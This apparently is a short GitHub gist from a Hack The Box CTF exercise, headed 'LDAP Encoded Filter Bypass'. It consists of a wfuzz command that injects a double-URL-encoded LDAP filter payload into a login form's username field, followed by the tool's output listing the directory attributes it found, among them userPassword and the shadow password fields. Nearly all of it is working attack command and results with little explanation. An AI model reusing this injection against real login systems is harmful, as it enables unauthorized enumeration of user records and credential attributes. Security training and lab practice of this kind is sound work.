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Created March 9, 2019 16:51
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  • Save dualfade/0e6d65beec3e4fd381c76b2c7f375e91 to your computer and use it in GitHub Desktop.
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LDAP Encoded Filter Bypass - Find valid atributes
./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u '' -p
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
* Wfuzz 2.3.4 - The Web Fuzzer *
Total requests: 2026
ID Response Lines Word Chars Payload
000006: C=200 68 L 231 W 2822 Ch "objectClass"
000007: C=200 68 L 231 W 2822 Ch "structuralObjectClass"
000008: C=200 68 L 231 W 2822 Ch "createTimestamp"
000009: C=200 68 L 231 W 2822 Ch "modifyTimestamp"
000010: C=200 68 L 231 W 2822 Ch "creatorsName"
000011: C=200 68 L 231 W 2822 Ch "modifiersName"
000012: C=200 68 L 231 W 2822 Ch "hasSubordinates"
000013: C=200 68 L 231 W 2822 Ch "subschemaSubentry"
000016: C=200 68 L 231 W 2822 Ch "entryDN"
000017: C=200 68 L 231 W 2822 Ch "entryUUID"
000018: C=200 68 L 231 W 2822 Ch "entryCSN"
000052: C=200 68 L 231 W 2822 Ch "name"
000053: C=200 68 L 231 W 2822 Ch "cn"
000054: C=200 68 L 231 W 2822 Ch "uid"
000055: C=200 68 L 231 W 2822 Ch "uidNumber"
000056: C=200 68 L 231 W 2822 Ch "gidNumber"
000057: C=200 68 L 231 W 2822 Ch "userPassword"
000292: C=200 68 L 231 W 2822 Ch "sn"
000339: C=200 68 L 231 W 2822 Ch "mail"
000369: C=200 68 L 231 W 2822 Ch "pager"
000398: C=200 68 L 231 W 2822 Ch "homeDirectory"
000399: C=200 68 L 231 W 2822 Ch "loginShell"
000400: C=200 68 L 231 W 2822 Ch "shadowLastChange"
000401: C=200 68 L 231 W 2822 Ch "shadowMin"
000402: C=200 68 L 231 W 2822 Ch "shadowMax"
000403: C=200 68 L 231 W 2822 Ch "shadowWarning"
Total time: 2029.345
Processed Requests: 2026
Filtered Requests: 2000
Requests/sec.: 0.998351
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